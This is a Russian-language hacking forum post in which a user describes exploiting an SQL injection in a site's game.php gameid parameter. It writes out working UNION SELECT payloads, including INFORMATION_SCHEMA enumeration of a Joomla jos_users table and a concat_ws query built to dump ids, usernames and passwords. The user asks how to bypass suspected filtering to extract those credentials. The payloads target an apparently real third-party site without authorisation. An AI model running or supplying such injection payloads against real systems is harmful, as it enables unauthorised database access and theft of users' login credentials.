05.05.2012, 11:18
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
Раскручиваю sql- иньекцию.
Наугад нашел таблицу games.
Запрос вида:
Сообщение от None
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+games--
работает.
Запрос типа:
Сообщение от None
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+jos_users--
не работает.
Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается.
Сообщение от None
game.php?gameid=-1+union+select+1,UNHEX(HEX(COLUMN_NAME)),3,4,5,6,7 ,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E=0x6a6f735f7573657273+LIMIT+2,1%20--
- срабатывает.
Подозреваю на фильтрацию или некорректную кодировку в базе данных.
Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
|
|
|